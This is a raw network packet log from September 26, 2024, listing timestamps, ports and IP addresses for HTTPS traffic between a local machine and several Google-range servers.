Sep 26, 2024 17:55:28.604259968 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.605511904 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.605564117 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.605581999 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.606046915 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.606084108 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.606105089 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.606115103 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.606159925 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.606184006 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.606190920 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.606234074 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.606240034 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.607614040 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.607667923 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.607682943 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.608876944 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.608927965 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.608952045 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.608973026 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.609019041 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.609900951 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.609972000 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.609985113 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.612190008 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.612262964 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.612271070 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.613756895 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.613765955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.613821983 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.613826990 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.613857985 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.613895893 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.613904953 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.614602089 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.614655018 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.614667892 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.617058992 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.617089033 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.617115974 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.617130041 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.617176056 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.617558956 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.617609024 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.617625952 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.619106054 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.621321917 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.621354103 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.621391058 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.621401072 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.621467113 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.621758938 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.621812105 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.621814966 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.621836901 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.621876955 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.623826981 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.624253988 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624296904 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624317884 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.624330044 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624341965 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624377966 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.624407053 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624440908 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624449015 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.624466896 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.624511003 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.625878096 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.625942945 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.625997066 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.626012087 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.628221035 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.628253937 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.628274918 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.628289938 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.628336906 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.629476070 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.629709959 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.629728079 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.629823923 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.629869938 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.629872084 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.629893064 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.629946947 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.630187988 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.630546093 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.630635977 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.630683899 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.631593943 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.632802963 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.632855892 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.632878065 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.633523941 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.634656906 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634733915 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634763002 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634778976 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.634803057 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634838104 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634841919 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.634850025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.634866953 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.634891987 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.634917974 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.634939909 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.637245893 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.637279034 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.637307882 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.637329102 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.637370110 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.637376070 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.637420893 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.637425900 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.637450933 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.637490988 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.639674902 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.641493082 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.641746044 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.641778946 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.641789913 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.641812086 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.641851902 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.643299103 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643435955 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643460989 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643484116 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643491983 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643515110 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643559933 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643574953 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643616915 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643620014 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643626928 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643668890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643685102 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643750906 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643789053 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643793106 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643800974 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.643837929 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.643903971 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.645138979 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.645183086 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.645209074 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.645241022 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.645282984 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.646433115 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.646459103 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.646485090 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.646506071 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.646543980 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.647582054 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.648332119 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.650350094 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.650393009 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.650405884 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.650429010 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.650482893 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.650701046 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.650734901 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.650762081 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.650783062 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.650829077 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.651372910 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651423931 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651488066 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.651501894 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651550055 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651580095 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651608944 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651612043 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.651619911 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651645899 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.651693106 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651730061 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651730061 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.651741028 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.651779890 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.651787996 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.652316093 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.652471066 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.655257940 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.655258894 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.655303955 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.655343056 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.655363083 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.655400038 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.655401945 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.656141996 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.656163931 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.656207085 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.656867981 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.657041073 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.657116890 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.657159090 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.657172918 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.657355070 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.657402992 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:28.657458067 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:28.659754992 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.659789085 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.659812927 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.659825087 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.659868956 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.661160946 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.661212921 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.661252975 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.661259890 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.663399935 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663436890 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663451910 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663474083 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663515091 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663549900 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663633108 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663666010 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663667917 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663676023 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663713932 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663722038 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663778067 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663813114 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663835049 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663841009 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.663888931 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.663896084 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.664263010 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.664309025 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.664316893 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.665354967 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.665410042 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.665417910 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.668181896 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.668236971 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.668245077 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.669388056 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.669446945 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.669456005 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.672652006 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.672705889 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.672713041 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.673430920 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.673485994 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.673492908 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.675400972 CEST	443	49751	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.676373959 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.676428080 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.676435947 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.676898956 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.676956892 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.676974058 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677017927 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677052021 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677059889 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.677069902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677109957 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.677117109 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677176952 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677212000 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677217960 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.677225113 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677254915 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.677261114 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677294970 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.677325964 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.677331924 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678492069 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678531885 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678543091 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.678558111 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678594112 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.678597927 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678611040 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.678682089 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.678689957 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.679898977 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.679955006 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.679963112 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.682368040 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.682419062 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.682425976 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.683142900 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.683178902 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.683192968 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.683217049 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.683259964 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.683264017 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.683270931 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.683305979 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.683320045 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.684581995 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.684633017 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.684639931 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.685189009 CEST	49751	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.685513020 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.685568094 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.685578108 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.687345982 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.687406063 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.687412977 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.689234018 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.689286947 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.689292908 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.690047979 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690103054 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690124989 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690172911 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690210104 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690217018 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690224886 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690257072 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690273046 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690351963 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690391064 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690397978 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690408945 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690440893 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690450907 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690594912 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690634966 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:28.690643072 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.690893888 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.690949917 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.690957069 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.692414045 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.692471981 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.692483902 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.694031000 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.694088936 CEST	49742	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:28.694096088 CEST	443	49742	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:28.694756031 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:28.694792032 CEST	443	49736	142.250.186.132	192.168.2.16
